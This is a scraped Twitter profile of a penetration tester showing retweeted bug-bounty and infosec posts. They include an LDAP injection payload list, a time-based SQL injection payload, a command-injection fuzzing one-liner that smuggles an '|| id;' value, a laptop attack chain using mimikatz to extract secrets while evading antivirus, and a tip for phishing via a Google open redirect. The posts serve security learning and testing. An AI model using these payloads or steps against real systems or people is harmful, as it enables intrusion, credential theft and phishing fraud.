PenTestical (@ptestical) 's Twitter Profile
PenTestical

@ptestical

Penetration Tester | OSCP | Super Nintendo Generation 🎮 | German Content Creator / Hacking Macking auf yt 🎥

ID: 1190173347449131010

linkhttps://www.youtube.com/channel/UCy4SXJC08b_us13SO3abuFg calendar_today01-11-2019 07:47:01

1,1K Tweet

1,1K Followers

1,1K Following

PT SWARM (@ptswarm) 's Twitter Profile Photo

💥 New attack! Our researcher Arseniy Sharoglazov discovered a PHP's Arbitrary Object Instantiation with no user-defined classes. It was turned to RCE! Read the research: swarm.ptsecurity.com/exploiting-arb…

💥 New attack! Our researcher Arseniy Sharoglazov discovered a PHP's Arbitrary Object Instantiation with no user-defined classes. It was turned to RCE!

Read the research: swarm.ptsecurity.com/exploiting-arb…
Md Ismail Šojal 🕷️ (@0x0sojalsec) 's Twitter Profile Photo

Stealing WiFi passwords with XSS and without being connected to the network. By @Elber333 NIce ! #bugbountytips #cybersecurity #infosec

Stealing WiFi passwords with XSS and without being connected to the network.
By @Elber333
NIce !

#bugbountytips #cybersecurity #infosec
Abhishek Meena - {🔥} (@aacle_) 's Twitter Profile Photo

LDAP injection payloads 🔥🔥🔥🔥 * *)(& *))%00 )(cn=))\x00 *()|%26' *()|&' *(|(mail=*) *(|(objectclass=*)) *)(uid=*))(|(uid=* admin* admin*)((|userpassword=*) admin*)((|userPassword=*) x' or name()='username' or 'x'='y #bugbounty #infosec

Mike Felch (Stay Ready) (@ustayready) 's Twitter Profile Photo

Want to create great phishing links using an open-redirect on google.com? While they don't last forever, they are a great way to trick unsuspecting victims into clicking a legit looking URL before expiring! gist.github.com/ustayready/3ba… Follow the 🧵for how it works..

Want to create great phishing links using an open-redirect on google.com? While they don't last forever, they are a great way to trick unsuspecting victims into clicking a legit looking URL before expiring! gist.github.com/ustayready/3ba… Follow the 🧵for how it works..
YesWeHack ⠵ (@yeswehack) 's Twitter Profile Photo

⏰ DOJO Challenge - DOM XSS (Butters Adventure) 🎁 Top 3 reports win a swag pack! 🗓️ Submit your solution before 05/01/2023 Check out it out here 😼👇 dojo-yeswehack.com/practice/ca271… #BugBounty #YesWeRHackers #YWHDOJO

⏰ DOJO Challenge - DOM XSS (Butters Adventure)

🎁 Top 3 reports win a swag pack! 
🗓️ Submit your solution before 05/01/2023

Check out it out here 😼👇
dojo-yeswehack.com/practice/ca271…

#BugBounty #YesWeRHackers #YWHDOJO
Intigriti (@intigriti) 's Twitter Profile Photo

We let ChatGPT write today's #BugBytes tweet and this is what it wrote 👇 I'm sorry, but I am not able to write about anything related to Bug Bytes or chatGPT, as I am a large language model trained by OpenAI and do not have access to curren- oh nvm lets bring the human back

Nihad (@nihad_rekany) 's Twitter Profile Photo

Yay, I was awarded a $x,xxx bounty on HackerOne! I found Critical bug Time-based SQL injection on JSON parameter Payload: (select*from(select(sleep(20)))a) #TogetherWeHitHarder

Yay, I was awarded a $x,xxx bounty on <a href="/Hacker0x01/">HackerOne</a>!

I found Critical bug Time-based SQL injection on JSON parameter

Payload: (select*from(select(sleep(20)))a)

 #TogetherWeHitHarder
an0n (@an0n_r0) 's Twitter Profile Photo

1. remove disk from target laptop 2. virtualize system (VBoxManage convertfromraw) 3. abuse local admin (chntpw using alt booted system) 4. run mimikatz by reflective loading (bypass ESET :) ) 5. extract machine cert / secrets NEVER deploy company laptop without BitLocker.

1. remove disk from target laptop
2. virtualize system (VBoxManage convertfromraw)
3. abuse local admin (chntpw using alt booted system)
4. run mimikatz by reflective loading (bypass ESET :) )
5. extract machine cert / secrets

NEVER deploy company laptop without BitLocker.
Intigriti (@intigriti) 's Twitter Profile Photo

[1️⃣] Spot The Vulnerability 📜 Hackers love spotting vulnerabilities! Spot the vulnerability in this code snippet and get your first flag! 🔗 go.intigriti.com/nahamcon

[1️⃣] Spot The Vulnerability 📜

Hackers love spotting vulnerabilities! Spot the vulnerability in this code snippet and get your first flag!

🔗 go.intigriti.com/nahamcon
Ben Sadeghipour (@nahamsec) 's Twitter Profile Photo

Just released Inti De Ceukelaire "RTFR (Read The Bleeping RFC)" from #NahamConEU2022! These attack vectors are incredible creative and worth implementing them in your day to day testing! youtu.be/4ZsTKvfP1g0

Just released <a href="/securinti/">Inti De Ceukelaire</a> "RTFR (Read The Bleeping RFC)" from #NahamConEU2022! These attack vectors are incredible creative and worth implementing them in your day to day testing! 

youtu.be/4ZsTKvfP1g0
Md Ismail Šojal 🕷️ (@0x0sojalsec) 's Twitter Profile Photo

Command Injection: by N0t0d4y ~Find Your subdomains ~cat subdomains.txt | httpx | gau | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt ~ ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080 ~search for ”uid” in burp proxy intercept #infosec #bugbountytips

Command Injection: by <a href="/0xJin/">N0t0d4y</a> 
~Find Your subdomains 
~cat subdomains.txt | httpx | gau | qsreplace “aaa%20%7C%7C%20id%3B%20x” &gt; fuzzing.txt
~ ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080
~search for ”uid” in burp proxy intercept 
#infosec #bugbountytips
Neh Patel 🇮🇳 (@thecyberneh) 's Twitter Profile Photo

Just got another CRLF injection, and exploiting it to #XSS but Server is returning 302 status code with location param which is preventing my javascript to return XSS promot Any tips to bypass this thing and get xss prompt? #bugbountytips #cybersecuritytips

Just got another CRLF injection, and exploiting it to #XSS but Server is returning 302 status code with location param which is preventing my javascript to return XSS promot

Any tips to bypass this thing and get xss prompt?
#bugbountytips #cybersecuritytips
PenTestical (@ptestical) 's Twitter Profile Photo

Just found my first SQL injection on a bug bounty platform. Tip: postgreSQL has a lot of tricks to escalate from SQLi to RCE. Don't stop at the SQLi itself. #bugbountytips #bugbounty #rce #sqli #postgresql #hacking #hacken book.hacktricks.xyz/pentesting-web…